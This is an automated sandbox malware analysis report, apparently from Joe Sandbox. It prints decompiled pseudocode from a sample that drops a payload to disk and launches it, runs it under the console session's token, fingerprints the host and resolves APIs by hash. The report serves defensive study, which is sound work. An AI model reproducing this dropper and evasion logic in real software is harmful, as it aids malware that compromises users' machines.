0x00a8792f
0x00a87937
0x00a8793e
0x00a87941
0x00a87944
0x00a87947
0x00a8794a
0x00a87958
0x00a8795b
0x00a87a8a
0x00a87a8f
0x00a87a92
0x00a87a95
0x00a87a9a
0x00a87a9d
0x00a87aa3
0x00a87aac
0x00a87abb
0x00a87ac8
0x00a87acd
0x00a87b13
0x00a87b13
0x00a87b13
0x00a87b16
0x00000000
0x00000000
0x00a87b18
0x00a87b22
0x00000000
0x00a87b24
0x00a87b29
0x00a87b2c
0x00a87b31
0x00000000
0x00a87b33
0x00a87b36
0x00a87b3f
0x00a87b49
0x00a87bc0
0x00a87bc2
0x00000000
0x00a87bc8
0x00a87bd1
0x00a87bd4
0x00a87bd9
0x00a87b10
0x00000000
0x00a87bdf
0x00a87be8
0x00a87bea
0x00a87bf0
0x00a87bf0
0x00a87bf4
0x00a87bf7
0x00a87bfd
0x00000000
0x00000000
0x00a87bff
0x00a87c03
0x00a87c06
0x00a87c0c
0x00a87c0e
0x00a87c12
0x00a87c15
0x00a87c1b
0x00a87c1d
0x00a87c21
0x00a87c24
0x00a87c2a
0x00a87c2c
0x00a87c2d
0x00000000
0x00000000
0x00a87c2d
0x00a87c2a
0x00a87c1b
0x00000000
0x00a87c0c
0x00a87c31
0x00a87c34
0x00a87c37
0x00a87ca0
0x00a87ca5
0x00a87ca9
0x00000000
0x00a87c39
0x00a87c41
0x00a87c4e
0x00a87c54
0x00a87c57
0x00a87c5d
0x00000000
0x00a87c63
0x00a87c68
0x00a87c6b
0x00a87c70
0x00a87c73
0x00a87c76
0x00a87c78
0x00a87c7d
0x00000000
0x00a87c83
0x00a87c86
0x00a87c8b
0x00a87c93
0x00000000
0x00a87c93
0x00a87c7d
0x00a87c5d
0x00a87c37
0x00a87bd9
0x00a87b4b
0x00a87b4b
0x00a87b55
0x00000000
0x00a87b5b
0x00a87b60
0x00a87b63
0x00a87b69
0x00000000
0x00a87b6f
0x00a87b72
0x00a87b80
0x00000000
0x00a87b82
0x00a87b82
0x00a87b8c
0x00000000
0x00a87b92
0x00a87b97
0x00a87b9a
0x00a87ba0
0x00000000
0x00a87ba6
0x00a87ba9
0x00a87bb7
0x00a87bba
0x00000000
0x00000000
0x00000000
0x00000000
0x00a87bba
0x00a87ba0
0x00a87b8c
0x00a87b80
0x00a87b69
0x00a87b55
0x00a87b49
0x00a87b31
0x00a87f55
0x00a87f55
0x00a87f58
0x00a87f5e
0x00a87f67
0x00a87f70
0x00a87f73
0x00a87f78
0x00a87fb1
0x00a87fb6
0x00a87fb9
0x00a87fc1
0x00a87fcc
0x00a87fd0
0x00a88002
0x00a87fd2
0x00a87fd2
0x00000000
0x00a87fd2
0x00a87f7a
0x00a87f7a
0x00a87f7d
0x00a87f80
0x00a87f89
0x00a8781b
0x00a8781b
0x00000000
0x00a87f8f
0x00a87f9f
0x00000000
0x00a87fa1
0x00a87fa8
0x00a87fab
0x00000000
0x00000000
0x00000000
0x00000000
0x00a87fab
0x00a87f9f
0x00a87f89
0x00000000
0x00a87f78
0x00000000
0x00a87acf
0x00a87acf
0x00a87acf
0x00a87acf
0x00000000
0x00a87961
0x00a87963
0x00a87ad2
0x00a87ad5
0x00000000
0x00a87cb1
0x00a87cb1
0x00a87cb4
0x00000000
0x00a87cb4
0x00a87976
0x00a87979
0x00a8797c
0x00a87984
0x00a8798d
0x00a87a83
0x00a87a83
0x00a87a85
0x00a87ae3
0x00a87ae3
0x00a87ae6
0x00a87aeb
0x00a87cb7
0x00a87cb7
0x00a87cb9
0x00a87cbb
0x00a87af1
0x00a87af7
0x00000000
0x00a87b06
0x00a87af7
0x00a87993
0x00a87996
0x00a879a0
0x00a879a9
0x00a879ac
0x00000000
0x00000000
0x00000000
0x00a879ac
0x00a879ae
0x00a879b4
0x00000000
0x00a879ba
0x00a879ba
0x00000000
0x00a879ba
0x00a879b4
0x00a8798d
0x00a87963
0x00a87cbe
0x00a87cc3
0x00a87e53
0x00a87e9b
0x00a87ed3
0x00a87ed6
0x00a87ed9
0x00a87ed9
0x00a87ede
0x00a87ee1
0x00a87ee6
0x00a87eec
0x00a87ef2
0x00a87efc
0x00a87efe
0x00a87efe
0x00a87f01
0x00a87f03
0x00a87f06
0x00a87f0a
0x00a87f11
0x00a87f11
0x00a87f16
0x00a87f24
0x00a87f2b
0x00a87f32
0x00a87f35
0x00a87f38
0x00a87f43
0x00a87f45
0x00000000
0x00a87f45
0x00a87ead
0x00a87ead
0x00a87eb7
0x00a87ec2
0x00a87ec5
0x00a87ec8
0x00a87ec8
0x00a87e55
0x00a87e5c
0x00a87e5f
0x00a87e69
0x00a87e6c
0x00a87e71
0x00a87e74
0x00a87e76
0x00a87e76
0x00a87e79
0x00a87e7b
0x00a87e7e
0x00a87e82
0x00a87e89
0x00a87e89
0x00a87e8c
0x00a87e8f
0x00a87f4d
0x00a87f4d
0x00a87f4d
0x00a87cc9
0x00a87ccb
0x00a87dbb
0x00a87dc7
0x00a87dca
0x00a87dcf
0x00a87dd2
0x00a87dd8
0x00a87dde
0x00a87de8
0x00a87dea
0x00a87dea
0x00a87ded
0x00a87def
0x00a87df2
0x00a87df6
0x00a87dfd
0x00a87dfd
0x00a87e1e
0x00a87e21
0x00a87e29
0x00a87e2f
0x00a87e39
0x00a87e39
0x00a87e44
0x00a87e45
0x00a87cd1
0x00a87cd4
0x00a87cd7
0x00a87cda
0x00a87cdf
0x00a87ce2
0x00a87ce4
0x00a87ce4
0x00a87ce7
0x00a87ce9
0x00a87cec
0x00a87cf0
0x00a87cf7
0x00a87cf7
0x00a87cfd
0x00a87d0b
0x00a87daa
0x00a87dad
0x00a87db0
0x00a87db3
0x00a87d11
0x00a87d14
0x00a87d17
0x00a87d1a
0x00a87d1a
0x00a87d1f
0x00a87d22
0x00a87d27
0x00a87d2d
0x00a87d33
0x00a87d3d
0x00a87d3f
0x00a87d3f
0x00a87d42
0x00a87d44
0x00a87d47
0x00a87d4b
0x00a87d52
0x00a87d52
0x00a87d57
0x00a87d65
0x00a87d6c
0x00a87d73
0x00a87d76
0x00a87d79
0x00a87d84
0x00a87d8e
0x00a87d8e
0x00a87d96
0x00a87d96
0x00a87d0b
0x00a87ccb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8791a
0x00a87fe2
0x00a87fe9
0x00a87ff4
0x00000000

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d31a706c6669723ed94e9328e01490c08dc92bed0fb213c801eeb509403f7b
Instruction ID: 19f5d0e05750d9bc9ff3754d613ea2829fbc231de0521e613fe46983d2a4fe47
Opcode Fuzzy Hash: 82d31a706c6669723ed94e9328e01490c08dc92bed0fb213c801eeb509403f7b
Instruction Fuzzy Hash: A9428B35A08B458FCB29DF69C4906AEFBF2FF88304F28896DD49A97651D734E941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A81BE0, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction ID: d1e5595f1bb065bef28b09a47d2f7ca4190f25ea71ef1eefbcaaa3fb0a395c89
Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction Fuzzy Hash: 8901F773A400199BCB20EF4AD5806B9F3E9FB94365B9940AAE94887200E731AD92C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E00A8A3A0(long _a4) {
				void* _v8;
				long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v96;
				char _v156;
				char _v284;
				short _v804;
				char _v1324;
				void* _t58;
				signed int _t62;
				WCHAR* _t68;
				long _t89;
				signed int _t93;
				WCHAR* _t99;
				void* _t122;
				void* _t123;
				void* _t136;
				void* _t139;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				_t136 = _a4;
				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
				if(_t58 == 0) {
					_t122 =  *(_t136 + 8);
					_a4 =  *((intOrPtr*)(_t136 + 0xc));
					 *0xa8c214(0, 0x23, 0, 0,  &_v804);
					_t62 = GetTickCount();
					_t39 = (_t62 & 0x0000000f) + 4; // 0x4
					E00A82240( &_v284, _t39);
					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
					E00A81830(0xa815a4, 0xc, 0x435ca571,  &_v12);
					_t139 = _v12;
					_t68 =  &_v804;
					 *0xa8c200(_t68, 0x104, _t139, _t68,  &_v284);
					HeapFree(GetProcessHeap(), 0, _t139);
					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_t140 == 0xffffffff) {
						L13:
						HeapFree(GetProcessHeap(), 0, _t136);
						return 0;
					}
					WriteFile(_t140, _t122, _a4,  &_a4, 0);
					CloseHandle(_t140);
					memset( &_v96, 0, 0x44);
					_v96.cb = 0x44;
					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
						goto L13;
					}
					CloseHandle(_v28.hProcess);
					_push(_v28.hThread);
					L12:
					CloseHandle();
					goto L13;
				}
				if(_t58 != 1) {
					goto L13;
				}
				_t89 =  *((intOrPtr*)(_t136 + 0xc));
				_t123 =  *(_t136 + 8);
				_v12 = _t89;
				_a4 = 0;
				__imp__WTSGetActiveConsoleSessionId();
				if(_t89 == 0xffffffff) {
					goto L13;
				}
				_push( &_v8);
				_push(_t89);
				if( *0xa8c224() != 0) {
					 *0xa8c074(_v8, 0x2000000, 0, 1, 1,  &_a4);
					CloseHandle(_v8);
				}
				 *0xa8c214(0, 0x23, 0, 0,  &_v804);
				_t93 = GetTickCount();
				_t13 = (_t93 & 0x0000000f) + 4; // 0x4
				E00A82240( &_v156, _t13);
				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
				E00A81830(0xa815a4, 0xc, 0x435ca571,  &_v8);
				_t143 = _v8;
				_t99 =  &_v804;
				 *0xa8c200(_t99, 0x104, _t143, _t99,  &_v156);
				HeapFree(GetProcessHeap(), 0, _t143);
				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t144 != 0xffffffff) {
					WriteFile(_t144, _t123, _v12,  &_v12, 0);
					CloseHandle(_t144);
					E00A81830(0xa81398, 4, 0x435ca571,  &_v8);
					_t145 = _v8;
					 *0xa8c200( &_v1324, 0x104, _t145,  &_v804);
					HeapFree(GetProcessHeap(), 0, _t145);
					if(E00A82180( &_v1324, _a4,  &_v28) != 0) {
						CloseHandle(_v28);
						CloseHandle(_v28.hThread);
					}
				}
				_push(_a4);
				goto L12;
			}

0x00a8a3ac
0x00a8a3b2
0x00a8a3b3
0x00a8a550
0x00a8a553
0x00a8a565
0x00a8a56b
0x00a8a57c
0x00a8a57f
0x00a8a58b
0x00a8a5a1
0x00a8a5a6
0x00a8a5b0
0x00a8a5be
0x00a8a5d1
0x00a8a5f6
0x00a8a5fb
0x00a8a666
0x00a8a670
0x00a8a67e
0x00a8a67e
0x00a8a608
0x00a8a60f
0x00a8a61d
0x00a8a626
0x00a8a652
0x00000000
0x00000000
0x00a8a657
0x00a8a65d
0x00a8a660
0x00a8a660
0x00000000
0x00a8a660
0x00a8a3ba
0x00000000
0x00000000
0x00a8a3c0
0x00a8a3c3
0x00a8a3c6
0x00a8a3c9
0x00a8a3d0
0x00a8a3d9
0x00000000
0x00000000
0x00a8a3e2
0x00a8a3e3
0x00a8a3ec
0x00a8a400
0x00a8a409
0x00a8a409
0x00a8a41e
0x00a8a424
0x00a8a435
0x00a8a438
0x00a8a444
0x00a8a45a
0x00a8a45f
0x00a8a469
0x00a8a477
0x00a8a48a
0x00a8a4af
0x00a8a4b4
0x00a8a4c5
0x00a8a4cc
0x00a8a4e5
0x00a8a4ea
0x00a8a501
0x00a8a514
0x00a8a531
0x00a8a536
0x00a8a53f
0x00a8a53f
0x00a8a531
0x00a8a545
0x00000000

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00A8A3D0
CloseHandle.KERNEL32(?), ref: 00A8A409
GetTickCount.KERNEL32 ref: 00A8A424
_snwprintf.NTDLL ref: 00A8A477
GetProcessHeap.KERNEL32(00000000,?), ref: 00A8A483
HeapFree.KERNEL32(00000000), ref: 00A8A48A
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00A8A4A9
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00A8A4C5
CloseHandle.KERNEL32(00000000), ref: 00A8A4CC
_snwprintf.NTDLL ref: 00A8A501
GetProcessHeap.KERNEL32(00000000,?), ref: 00A8A50D
HeapFree.KERNEL32(00000000), ref: 00A8A514
CloseHandle.KERNEL32(?), ref: 00A8A536
CloseHandle.KERNEL32(?), ref: 00A8A53F
GetTickCount.KERNEL32 ref: 00A8A56B
_snwprintf.NTDLL ref: 00A8A5BE
GetProcessHeap.KERNEL32(00000000,?), ref: 00A8A5CA
HeapFree.KERNEL32(00000000), ref: 00A8A5D1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00A8A5F0
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00A8A608
CloseHandle.KERNEL32(00000000), ref: 00A8A60F
memset.NTDLL ref: 00A8A61D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A8A64A
CloseHandle.KERNEL32(?), ref: 00A8A657
CloseHandle.KERNEL32(?), ref: 00A8A660
GetProcessHeap.KERNEL32(00000000,?), ref: 00A8A669
HeapFree.KERNEL32(00000000), ref: 00A8A670

Strings

D, xrefs: 00A8A626

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
String ID: D
API String ID: 65010116-2746444292
Opcode ID: 9f992953f5bee3d62eb2efd9a83edff9130fdb91b627bd4282c45a88ba1645fe
Instruction ID: c48f5b06ca05f49b4f619718933a8fbb4a75b9b5f257fb2e6b53a2029e463ce7
Opcode Fuzzy Hash: 9f992953f5bee3d62eb2efd9a83edff9130fdb91b627bd4282c45a88ba1645fe
Instruction Fuzzy Hash: 9B810D71940118BBEB10EBE0DC8AFEA7B7CFB08761F444255F609E61D1E7709A468FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A89320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00A89320(void* __ecx) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				signed int _t32;
				char* _t35;
				int _t53;
				signed int _t60;
				void* _t71;
				long _t72;
				void* _t74;
				void* _t75;
				signed int _t76;
				char _t77;
				void* _t79;
				signed short* _t80;
				long _t87;
				void* _t92;
				void* _t94;
				short* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t106;

				_t75 = __ecx;
				_t25 =  *0xa8c27c; // 0x0
				_t103 = _t102 - 0x28;
				 *0xa8c3ac = _t25;
				GetModuleFileNameW(0, 0xa8c9c8, 0x104);
				_t27 =  *0xa8c040(0, 0, 6);
				if(_t27 != 0) {
					 *0xa8c2a4 =  *0xa8c2a4 | 0x00000001;
					 *0xa8c0a8(_t27);
				}
				_t28 =  *0xa8c3ac; // 0x0
				_t96 = 0xa8c3b0;
				_v8 = _t28;
				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t92 == 0) {
					_t92 = _v12;
				} else {
					_push(_t75);
					E00A81790(0xa813d0, 0x158, _t92);
					_t103 = _t103 + 8;
				}
				_t76 =  *0xa8c1e4(_t92, _t71);
				_t72 = 2;
				_v12 = _t76;
				do {
					_t32 = _v8;
					_v8 =  !(_t32 / _t76);
					_t35 = _t92 + _t32 % _t76;
					if(_t35 <= _t92) {
						L9:
						if( *_t35 != 0x2c) {
							L11:
							_t77 =  *_t35;
							if(_t77 == 0) {
								goto L15;
							}
							while(_t77 != 0x2c) {
								_t35 = _t35 + 1;
								 *_t96 = _t77;
								_t96 = _t96 + 2;
								_t77 =  *_t35;
								if(_t77 != 0) {
									continue;
								}
								goto L15;
							}
							goto L15;
						}
						L10:
						_t35 = _t35 + 1;
						goto L11;
					}
					while( *_t35 != 0x2c) {
						_t35 = _t35 - 1;
						if(_t35 > _t92) {
							continue;
						}
						goto L9;
					}
					goto L10;
					L15:
					_t76 = _v12;
					_t72 = _t72 - 1;
				} while (_t72 != 0);
				HeapFree(GetProcessHeap(), 0, _t92);
				 *_t96 = 0;
				E00A81830(0xa81384, 0xc, 0x7d1cc189,  &_v12);
				_t104 = _t103 + 8;
				_push(0xa8c5b8);
				_push(0);
				_push(0);
				if(( *0xa8c2a4 & 0x00000001) == 0) {
					 *0xa8c214(0, 0x1c);
					_t87 = 0x14;
					_t79 = 0xa81530;
				} else {
					 *0xa8c214(0, 0x29);
					_t87 = 4;
					_t79 = 0xa81380;
				}
				E00A81830(_t79, _t87, 0x7d1cc189,  &_v8);
				_t97 = _v8;
				 *0xa8c200(0xa8c5b8, 0x104, _t97, 0xa8c5b8, 0xa8c3b0);
				HeapFree(GetProcessHeap(), 0, _t97);
				_t98 = _v12;
				 *0xa8c200(0xa8c7c0, 0x104, _t98, 0xa8c5b8, 0xa8c3b0);
				_t106 = _t104 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t98);
				_t99 = CreateFileW(0xa8c9c8, 0x80000000, 1, 0, 3, 0, 0);
				if(_t99 != 0xffffffff) {
					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0);
					if(_t94 != 0) {
						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0);
						if(_t74 != 0) {
							 *0xa8cbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0));
							UnmapViewOfFile(_t74);
						}
						CloseHandle(_t94);
					}
					CloseHandle(_t99);
				}
				_v12 = 0x10;
				_t53 = GetComputerNameW( &_v44,  &_v12);
				if(_t53 == 0) {
					L40:
					return _t53;
				} else {
					_t80 =  &_v44;
					if(_v44 == 0) {
						L36:
						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
						if(_t101 == 0) {
							_t101 = _v12;
						} else {
							_push(_t80);
							E00A81790(0xa81390, 8, _t101);
							_t106 = _t106 + 8;
						}
						 *0xa8c210(0xa8c2a8, 0x104, _t101,  &_v44,  *0xa8c3ac);
						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
						goto L40;
					}
					do {
						_t60 =  *_t80 & 0x0000ffff;
						if(_t60 < 0x30 || _t60 > 0x39) {
							if(_t60 < 0x61 || _t60 > 0x7a) {
								if(_t60 < 0x41 || _t60 > 0x5a) {
									 *_t80 = 0x58;
								}
							}
						}
						_t80 =  &(_t80[1]);
					} while ( *_t80 != 0);
					goto L36;
				}
			}

0x00a89320
0x00a89323
0x00a89328
0x00a8932b
0x00a8933c
0x00a89348
0x00a89350
0x00a89352
0x00a8935a
0x00a8935a
0x00a89360
0x00a8936e
0x00a89373
0x00a89383
0x00a89387
0x00a8939f
0x00a89389
0x00a89389
0x00a89395
0x00a8939a
0x00a8939a
0x00a893aa
0x00a893ac
0x00a893b1
0x00a893b4
0x00a893b4
0x00a893bd
0x00a893c0
0x00a893c5
0x00a893d1
0x00a893d4
0x00a893d7
0x00a893d7
0x00a893db
0x00000000
0x00000000
0x00a893e0
0x00a893e9
0x00a893ea
0x00a893ed
0x00a893f0
0x00a893f4
0x00000000
0x00000000
0x00000000
0x00a893f4
0x00000000
0x00a893e0
0x00a893d6
0x00a893d6
0x00000000
0x00a893d6
0x00a893c7
0x00a893cc
0x00a893cf
0x00000000
0x00000000
0x00000000
0x00a893cf
0x00000000
0x00a893f6
0x00a893f6
0x00a893f9
0x00a893f9
0x00a89406
0x00a89413
0x00a89424
0x00a89429
0x00a89433
0x00a89438
0x00a8943a
0x00a8943c
0x00a89458
0x00a8945e
0x00a89463
0x00a8943e
0x00a89442
0x00a89448
0x00a8944d
0x00a8944d
0x00a89471
0x00a89476
0x00a8948e
0x00a894a1
0x00a894a7
0x00a894bf
0x00a894c5
0x00a894d2
0x00a894f2
0x00a894f7
0x00a8950a
0x00a8950e
0x00a8951f
0x00a89523
0x00a89539
0x00a8953e
0x00a8953e
0x00a89545
0x00a89545
0x00a8954c
0x00a8954c
0x00a89555
0x00a89561
0x00a8956a
0x00a8960b
0x00a89610
0x00a89570
0x00a89575
0x00a89578
0x00a895ad
0x00a895be
0x00a895c2
0x00a895da
0x00a895c4
0x00a895c4
0x00a895d0
0x00a895d5
0x00a895d5
0x00a895f2
0x00a89605
0x00000000
0x00a89605
0x00a89580
0x00a89580
0x00a89586
0x00a89590
0x00a8959a
0x00a895a1
0x00a895a1
0x00a8959a
0x00a89590
0x00a895a4
0x00a895a7
0x00000000
0x00a89580

APIs

GetModuleFileNameW.KERNEL32(00000000,00A8C9C8,00000104,?,?,?,?,?,?,?,?,?,00A89310), ref: 00A8933C
GetProcessHeap.KERNEL32(00000008,0000015C,00000000,00A816C0,?,?,?,?,?,?,?,?,?,00A89310), ref: 00A89376
RtlAllocateHeap.NTDLL(00000000), ref: 00A8937D
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00A89310), ref: 00A893A4
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00A89310), ref: 00A893FF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00A89310), ref: 00A89406
_snwprintf.NTDLL ref: 00A8948E
GetProcessHeap.KERNEL32(00000000,00A89310), ref: 00A8949A
HeapFree.KERNEL32(00000000), ref: 00A894A1
_snwprintf.NTDLL ref: 00A894BF
GetProcessHeap.KERNEL32(00000000,?), ref: 00A894CB
HeapFree.KERNEL32(00000000), ref: 00A894D2
CreateFileW.KERNEL32(00A8C9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A894EC
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00A89504
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00A89519
GetFileSize.KERNEL32(00000000,00000000), ref: 00A89528
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00A89532
UnmapViewOfFile.KERNEL32(00000000), ref: 00A8953E
CloseHandle.KERNEL32(00000000), ref: 00A89545
CloseHandle.KERNEL32(00000000), ref: 00A8954C
GetComputerNameW.KERNEL32(?,?), ref: 00A89561
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00A895B1
RtlAllocateHeap.NTDLL(00000000), ref: 00A895B8
_snprintf.NTDLL ref: 00A895F2
GetProcessHeap.KERNEL32(00000000,00000010), ref: 00A895FE
HeapFree.KERNEL32(00000000), ref: 00A89605

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
String ID:
API String ID: 968319538-0
Opcode ID: 0103845d6a0d6cda8668c8b8af584b144e8e5c8a86844b1938c69d996ea6d9bd
Instruction ID: cf7350dc7999d64a0d59e7eeeb762440566452fa5c9884cbddea95ca97b5e09b
Opcode Fuzzy Hash: 0103845d6a0d6cda8668c8b8af584b144e8e5c8a86844b1938c69d996ea6d9bd
Instruction Fuzzy Hash: EB81A571A40204BFEB14BBE4AC8DFAF7B68EB45B21F180115F605EA1D1E7B099428F75

Uniqueness

Uniqueness Score: -1.00%

Function 00A89C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00A89C50(void* __ecx) {
				void* _v8;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_push(__ecx);
				E00A81830(0xa8155c, 0xc, 0x4a604ebc,  &_v8);
				_t100 = _v8;
				E00A81B10(LoadLibraryW(_t100), 0xa81040, 0x21, 0x54b7e774, 0xa8c040);
				HeapFree(GetProcessHeap(), 0, _t100);
				E00A81830(0xa81568, 0xc, 0x4a604ebc,  &_v8);
				_t101 = _v8;
				E00A81B10(LoadLibraryW(_t101), 0xa81024, 1, 0x3c505b91, 0xa8c0c8);
				HeapFree(GetProcessHeap(), 0, _t101);
				E00A81830(0xa81574, 0xc, 0x4a604ebc,  &_v8);
				_t102 = _v8;
				E00A81B10(LoadLibraryW(_t102), 0xa81028, 2, 0x10577008, 0xa8c214);
				HeapFree(GetProcessHeap(), 0, _t102);
				E00A81830(0xa81580, 0xc, 0x4a604ebc,  &_v8);
				_t103 = _v8;
				E00A81B10(LoadLibraryW(_t103), 0xa8100c, 1, 0x7194b56b, 0xa8c0c4);
				HeapFree(GetProcessHeap(), 0, _t103);
				E00A81830(0xa81550, 0xc, 0x4a604ebc,  &_v8);
				_t104 = _v8;
				E00A81B10(LoadLibraryW(_t104), 0xa810c4, 1, 0x20edec96, 0xa8c0cc);
				HeapFree(GetProcessHeap(), 0, _t104);
				E00A81830(0xa81544, 0xc, 0x4a604ebc,  &_v8);
				_t105 = _v8;
				E00A81B10(LoadLibraryW(_t105), 0xa810c8, 2, 0x620cb38e, 0xa8c21c);
				HeapFree(GetProcessHeap(), 0, _t105);
				E00A81830(0xa81598, 0xc, 0x4a604ebc,  &_v8);
				_t106 = _v8;
				E00A81B10(LoadLibraryW(_t106), 0xa81220, 0xe, 0x5a7185ae, 0xa8c230);
				HeapFree(GetProcessHeap(), 0, _t106);
				E00A81830(0xa8158c, 0xc, 0x4a604ebc,  &_v8);
				_t107 = _v8;
				E00A81B10(LoadLibraryW(_t107), 0xa81214, 3, 0x73ee0ad8, 0xa8c224);
				HeapFree(GetProcessHeap(), 0, _t107);
				return E00A892A0(_t61);
			}

0x00a89c53
0x00a89c68
0x00a89c6d
0x00a89c8d
0x00a89c9f
0x00a89cb8
0x00a89cbd
0x00a89cdd
0x00a89cef
0x00a89d08
0x00a89d0d
0x00a89d2d
0x00a89d3f
0x00a89d58
0x00a89d5d
0x00a89d7d
0x00a89d8f
0x00a89da8
0x00a89dad
0x00a89dcd
0x00a89ddf
0x00a89df8
0x00a89dfd
0x00a89e1d
0x00a89e2f
0x00a89e48
0x00a89e4d
0x00a89e6d
0x00a89e7f
0x00a89e98
0x00a89ea0
0x00a89ebd
0x00a89ecf
0x00a89ede

APIs

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

LoadLibraryW.KERNEL32(00A816C0,?,00A816C0), ref: 00A89C74
GetProcessHeap.KERNEL32(00000000,00A816C0,?,?,?,?,00A816C0), ref: 00A89C98
HeapFree.KERNEL32(00000000,?,?,?,?,00A816C0), ref: 00A89C9F
LoadLibraryW.KERNEL32(00A816C0,?,?,?,?,?,?,00A816C0), ref: 00A89CC4
